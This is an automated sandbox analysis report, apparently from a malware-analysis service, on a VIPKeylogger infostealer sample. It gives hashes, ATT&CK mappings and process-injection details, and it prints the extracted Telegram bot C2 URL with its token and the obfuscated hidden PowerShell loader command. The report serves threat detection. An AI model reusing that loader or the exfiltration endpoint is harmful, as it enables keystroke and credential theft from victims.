vipkeylogger | 2681c94188aa6193f7b51cafa73d0d0edc72e0c4e78fd29aa286e22e24583c63

General

Target

Lykkeskillingerne.exe
Size

517KB
MD5

a61d199b40c46ea1e0b9bb6f12165881
SHA1

9ce4221b5c7d8a67ba54b0709d5bbcc893ceed02
SHA256

c4f370cc453d04a84606b36451353fe65c56a5e758b2c138a23fc3741d7f4df9
SHA512

11274f2ea8c4c181e4a0163a947e7d893697db2b0dcb7a280e3a0e37059bb4d02998c0d32b1cc84084fe8e7d9684cec21da708ccefe0628711053626a09beb85
SSDEEP

12288:WZGcVEfEyolcupbbn6/tT9XfSJ37tdrQW:WZbSfEyolpb6FTM7dr9

Score

10^/10

vipkeylogger discovery execution keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

C2

https://api.telegram.org/bot6514469045:AAGgK1KLWbAJZ7dNmeGHg2OB9PfOTjGrT08/sendMessage?chat_id=6070006284

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2784	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
5	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	checkip.dyndns.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2704	ImagingDevices.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2784	powershell.exe
2704	ImagingDevices.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2784 set thread context of 2704	2784	powershell.exe	32

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ImagingDevices.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Lykkeskillingerne.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2784	powershell.exe
2704	ImagingDevices.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2784	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2704	ImagingDevices.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2428 wrote to memory of 2784	2428	Lykkeskillingerne.exe	29
PID 2428 wrote to memory of 2784	2428	Lykkeskillingerne.exe	29
PID 2428 wrote to memory of 2784	2428	Lykkeskillingerne.exe	29
PID 2428 wrote to memory of 2784	2428	Lykkeskillingerne.exe	29
PID 2784 wrote to memory of 2704	2784	powershell.exe	32
PID 2784 wrote to memory of 2704	2784	powershell.exe	32
PID 2784 wrote to memory of 2704	2784	powershell.exe	32
PID 2784 wrote to memory of 2704	2784	powershell.exe	32
PID 2784 wrote to memory of 2704	2784	powershell.exe	32
PID 2784 wrote to memory of 2704	2784	powershell.exe	32

C:\Users\Admin\AppData\Local\Temp\Lykkeskillingerne.exe
"C:\Users\Admin\AppData\Local\Temp\Lykkeskillingerne.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2428
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$Jordomsejling=Get-Content 'C:\Users\Admin\AppData\Local\Detenterne\Chiriguano.Wea';$Materiarian=$Jordomsejling.SubString(55684,3);.$Materiarian($Jordomsejling)
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2784
- - C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
    "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Detenterne\Chiriguano.Wea

Filesize
54KB

MD5
5a15c80c43773c2a95864ddce4db60f3

SHA1
7e1c9b6e38b52be2b7be175762dfd0e0d1b13b03

SHA256
2378274984d8afb8a08a1c7c2c657d6fe39d060607daeed2a021058794e0201c

SHA512
55469a4612b9db7a1d4f46f0c04b3e165de687cd51e0193fdc4adeccd4cc241935cf1f5a7db54f159afb03ca618787718a3eaedb50f80b265ebf91903bdd2369

Download Submit
C:\Users\Admin\AppData\Local\Detenterne\Passacaglio.Dra

Filesize
307KB

MD5
dbeb3bcf2cc83f702ace9ac6150380cb

SHA1
a525d51cec12d53ca5eb4f23f5cc21f07794189a

SHA256
f71f13432b58a0caea964317161d6877ae006b75e8098d17e85676e6bd11c615

SHA512
1a50cc238cded83d1a31898415938741c486197e703bad780520ac68c6651bef223c2ba49962ebfc7ddc876a9ab897e381b81c1b66fcd88d0ea4726a4b0b2916

Download Submit
memory/2704-47-0x0000000000D40000-0x0000000000D88000-memory.dmp

Filesize
288KB

Download
memory/2704-45-0x0000000000D40000-0x0000000001DA2000-memory.dmp

Filesize
16.4MB

Download
memory/2704-23-0x0000000000D40000-0x0000000001DA2000-memory.dmp

Filesize
16.4MB

Download
memory/2784-17-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-14-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-15-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-8-0x00000000742C1000-0x00000000742C2000-memory.dmp

Filesize
4KB

Download
memory/2784-16-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-11-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-19-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-20-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-21-0x00000000062D0000-0x000000000756B000-memory.dmp

Filesize
18.6MB

Download
memory/2784-12-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-10-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2784-9-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing